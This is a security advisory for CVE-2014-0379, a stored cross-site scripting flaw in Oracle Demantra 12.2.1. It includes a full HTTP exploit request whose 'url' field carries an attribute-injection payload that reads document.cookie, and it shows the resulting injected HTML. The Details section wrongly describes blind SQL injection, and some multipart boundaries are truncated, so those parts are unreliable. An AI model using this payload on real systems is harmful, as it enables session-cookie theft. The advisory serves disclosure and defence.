Oracle Demantra 12.2.1 Stored Cross Site Scripting

`Vulnerability title: Stored Cross-site Scripting in Oracle Demantra  
CVE: CVE-2014-0379  
Vendor: Oracle  
Product: Demantra  
Affected version: 12.2.1  
Fixed version: 12.2.3  
Reported by: Oliver Gruskovnjak  
  
Details:  
  
The Oracle Demantra application is vulnerable to SQL injection.  
  
An attacker with access to the vulnerable pages could manipulate the  
queries being sent to the database, potentially enabling them to extract  
sensitive information or modify content within the application.  
  
In this particular instance, exploitation was more difficult as the  
results of the attack had to inferred based on the pages returned, often  
referred to as "blind" SQL Injection.  
  
Exploit:  
  
Request:  
  
POST /demantra/TaskSender HTTP/1.1  
Host: www.target.com:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Referer: http://www.target.com:8080/demantra/portal/taskSender.jsp?tkn=187120466014305  
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=201BE9D6A85EA3E4BC837A4F01B9781F  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------12454397315614820331578362291  
Content-Length: 3093  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="selectedUsersVector"  
  
389  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="selectedUserList"  
  
389;  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="message"  
  
asdasda  
----------97315614820331578362291  
Content-Disposition: form-data; name="description"  
  
asdasdasdas  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="url"  
  
aaa"onmouseover="alert(document.cookie)  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="sendEmail"  
  
1  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_dueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_alertTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_dueTimeHours"  
  
14:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_alertTimeHours"  
  
08:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="hidden_escalateUserList"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="combination"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="dueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="alertTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="tkn"  
  
187120466014305  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="attachment"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="localizedDueTime"  
  
08/02/2013  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="dueTimeHours"  
  
14:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="localizedAlertTime"  
  
08/02/2013  
---------------12454397315614820331578362291  
Content-Disposition: form-data; name="alertTimeHours"  
  
08:30  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="escalateUserList"  
  
  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="sendEmailCheckbox"  
  
on  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="x"  
  
50  
-----------------------------12454397315614820331578362291  
Content-Disposition: form-data; name="y"  
  
7  
-----------------------------12454397315614820331578362291--  
  
Resulting Code in page:  
  
<!-- Message -->  
  
<td class="columnCellMessage">  
  
<a href="http://aaa"onmouseover="alert(document.cookie)" id="link793546" class="message" target="_blank">  
  
<b>asdasda</b>  
  
  
  
  
Further details at:  
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-0379/  
  
  
Copyright:  
Copyright (c) Portcullis Computer Security Limited 2014, All rights  
reserved worldwide. Permission is hereby granted for the electronic  
redistribution of this information. It is not to be edited or altered in  
any way without the express written consent of Portcullis Computer  
Security Limited.  
  
Disclaimer:  
The information herein contained may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There  
are NO warranties, implied or otherwise, with regard to this information  
or its use. Any use of this information is at the user's risk. In no  
event shall the author/distributor (Portcullis Computer Security  
Limited) be held liable for any damages whatsoever arising out of or in  
connection with the use or spread of this information.  
`